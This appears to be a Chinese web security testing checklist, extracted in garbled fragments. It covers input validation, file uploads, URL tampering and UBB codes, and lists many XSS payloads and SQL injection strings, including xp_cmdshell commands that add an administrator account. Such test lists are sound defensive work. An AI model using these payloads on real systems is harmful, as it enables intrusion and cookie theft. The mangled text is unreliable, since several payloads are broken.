常用安全性測(cè)試用例

1、常用安全性測(cè)試用例安全性測(cè)試：建立整體的威脅模型，測(cè)試溢出漏洞、信息泄漏、錯(cuò)誤處理、SQL注入、身份驗(yàn)證和授權(quán)錯(cuò)誤.1、輸入驗(yàn)證客戶(hù)端驗(yàn)證服務(wù)器端驗(yàn)證（禁用腳本調(diào)試，禁用Cookies）1. 輸入很大的數(shù)（如4,294,967,269），輸入很小的數(shù)（負(fù)數(shù)）2. 輸入超長(zhǎng)字符,如對(duì)輸入文字長(zhǎng)度有限制,則嘗試超過(guò)限制,剛好到達(dá)限制字?jǐn)?shù)時(shí)有何反應(yīng)3. 輸入特殊字符，如:!#$%八&*（）_+<>:"|4. 輸入中英文空格，輸入字符串中間含空格，輸入首尾空格5. 輸入特殊字符串NULL,null，0x0d0x0a6. 輸入正常字符串7. 輸入與要求不同類(lèi)型的字符，如:要

2、求輸入數(shù)字則檢查正值,負(fù)值,零值（正零，負(fù)零）,小數(shù),字母,空值;要求輸入字母則檢查輸入數(shù)字8. 輸入html和javascript代碼9. 對(duì)于像回答數(shù)這樣需檢驗(yàn)數(shù)字正確性的測(cè)試點(diǎn)，不僅對(duì)比其與問(wèn)題最終頁(yè)的回答數(shù)，還要對(duì)回答進(jìn)行添加刪除等操作后查看變化例如：1. 輸入<html”>”gfhd</html>,看是否出錯(cuò)；2. 輸入<inputtype=”text”name=”user”/>,看是否出現(xiàn)文本框；3. 輸入<scripttype=”text/javascript”>alert（“提示”）</script>看是否出現(xiàn)提示。關(guān)

3、于上傳：1. 上傳文件是否有格式限制,是否可以上傳exe文件；2. 上傳文件是否有大小限制,上傳太大的文件是否導(dǎo)致異常錯(cuò)誤,上傳0K的文件是否會(huì)導(dǎo)致異常錯(cuò)誤,上傳并不存在的文件是否會(huì)導(dǎo)致異常錯(cuò)誤；3. 通過(guò)修改擴(kuò)展名的方式是否可以繞過(guò)格式限制，是否可以通過(guò)壓包方式繞過(guò)格式限制；4. 是否有上傳空間的限制,是否可以超過(guò)空間所限制的大小,如將超過(guò)空間的大文件拆分上傳是否會(huì)出現(xiàn)異常錯(cuò)誤。5. 上傳文件大小大于本地剩余空間大小，是否會(huì)出現(xiàn)異常錯(cuò)誤。6. 關(guān)于上傳是否成功的判斷。上傳過(guò)程中，中斷。程序是否判斷上傳是否成功。7. 對(duì)于文件名中帶有中文字符，特殊字符等的文件上傳。下載：1. 避免輸入：.we

4、b.2. 修改命名后綴。關(guān)于URL：1 .某些需登錄后或特殊用戶(hù)才能進(jìn)入的頁(yè)面,是否可以通過(guò)直接輸入網(wǎng)址的方式進(jìn)入；2 .對(duì)于帶參數(shù)的網(wǎng)址,惡意修改其參數(shù),(若為數(shù)字,則輸入字母,或很大的數(shù)字,或輸入特殊字符等)后打開(kāi)網(wǎng)址是否出錯(cuò),是否可以非法進(jìn)入某些頁(yè)面；3 .搜索頁(yè)面等url中含有關(guān)鍵字的,輸入html代碼或JavaScript看是否在頁(yè)面中顯示或執(zhí)行。4 .輸入善意字符。UBB:url=.*.你的/url1 .試著用各種方式輸入U(xiǎn)BB代碼,比如代碼不完整,代碼嵌套等等.2 .在UBB代碼中加入屬性,如樣式,事件等屬性,看是否起作用3 .輸入編輯器中不存在的UBB代碼,看是否起作用url=

5、javascript:alert('hello')/urlemail=javascript:alert('hello')EMail/emailemail=STYLE="background-image:url(javascript:alert('XSS')"/emailimgstyle="background-image:url(javascript:alert('alert(xss)')"/imgimg"onmouseover=alert('hello');&qu

6、ot;/imgbSTYLE="background-image:url(javascript:alert('XSS')"一首詩(shī)酸澀澀服務(wù)網(wǎng)/biSTYLE="background-image:url(javascript:alert('XSS')"一二三四五六七市/i4 u一二三四五六七市/ufont=微軟雅黑"STYLE="background-image:url(javascript:alert('XSS')"一二三四五六七市/fontsize=4"STYLE=&

7、quot;background-image:url(javascript:alert('XSS')"一二三四五六七市/sizecolor=Red"STYLE="background-image:url(javascript:alert('XSS')"一二三四五六七市/coloralign=center"STYLE="background-image:url(javascript:alert('XSS')"一二三四五六七市/alignfloat=left"STYLE=&

8、quot;background-image:url(javascript:alert('XSS')"一二三四五六七市/floatfont=微軟雅黑STYLE="background-image:url(javascript:alert('XSS')"一二三四五六七市/fontsize=4STYLE="background-image:url(javascript:alert('XSS')"一二三四五六七市/sizecolor=RedSTYLE="background-image:url(

9、javascript:alert('XSS')"一二三四五六七市/coloralign=centerSTYLE="background-image:url(javascript:alert('XSS')"一二三四五六七市/alignlist=1indent一二三四五六七市/indentfloat=leftSTYLE="background-image:url(javascript:alert('XSS')"一二三四五六七市/floatmedia=ra,400,300,0bbsforblog.ika

10、ka./posttopic.aspx?forumid=109/media輸出編碼常用的測(cè)試輸入語(yǔ)句有：<inputtype="text"/><input/><input/<script>alert('hello');</script>1.jpg"onmouseover="alert('xss')"></a><script>alert(xss);</script>xxx'alert('xss');

11、var/ a='a>xss&<a=”;b=”;alert(/xss/);/”/><imgsrc=“輸出容”border=“0”alt=“l(fā)ogo“”“力”title=對(duì)輸出數(shù)據(jù)到輸出數(shù)據(jù)的對(duì)比，看是否出現(xiàn)問(wèn)題防止SQL注入Admin-or-midand()execinsert*%chrand1=1;And1=1;aNd1=1;char(97)char(110)char(100)char(49)char(61)char(49);%20AND%201=2and1=1;And1=1;aNd1=1and1=2;and1=2and2=2anduser>0an

12、d(selectcount(*)fromsysobjects)>0and(selectcount(*)frommsysobjects)>0and(SelectCount(*)fromAdmin)>=0and(selecttop1len(username)fromAdmin)>0(username知字段）;exec master.xp_cmdshell/add ” net user name password;execmaster.xp_cmdshell“netlocalgroupnameadministrators/add”and0<>(selectcoun

13、t(*)fromadmin)簡(jiǎn)單的如wherextype=U，字符U對(duì)應(yīng)的ASCII碼是85，所以可以用wherextype=char(85)代替；如果字符是中文的，比如wherename=用戶(hù)，可以用wherename=nchar(29992)+nchar(25143)代替。跨站腳本攻擊(XSS)對(duì)于XSS，只需檢查HTML輸出并看看您輸入的容在什么地方。它在一個(gè)HREF標(biāo)記中嗎？是否在IFRAME標(biāo)記中？它在CLSID標(biāo)記中嗎？在IMGSRC中嗎？某些Flash容的PARAMNAME是怎樣的？!#$%A&*()_+<>,./?;'"-%3Cinput/

14、%3E%3Cscript%3Ealert('XSS')%3C/script%3E<inputtype="text"/><input/><input/<script>alert('xss')</script><script>alert('xss');</script></script><script>alert('xss')</script>javascript:alert(/xss/)javascr

15、ip&#116&#58alert(/xss/)<imgsrc="#"onerror=alert(/xss/)><imgsrc="#"style="Xss:expression(alert(/xss/);”><imgsrc="#"/*/onerror=alert(/xss/)width=100>='><script>alert(document.cookie)</script>1.jpg"onmouseover="al

16、ert('xss')"></a><script>alert(xss);</script>xxx'alert('xss');var/a='a”>xss&<"onmouseover=alert('hello');"&alert('hello');>"'><script>alert(XSS')</script>alert(%27X>%22%27>&l

17、t;img%20src%3d%22javascript:SS%27)%22>>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27)%22%20OS%22e)">

18、</table><tablebackground="javascript:alert(cod<objecttype=text/htmldata="javascript:alert(code);"></object><bodyonload="javascript:alert(code)"></body>a?<script>alert(Vulnerable)</script><!-'">&:varfrom=$!rundata.Parameters.getString(from)'varfrom=”;hackerFunction(document.cookie);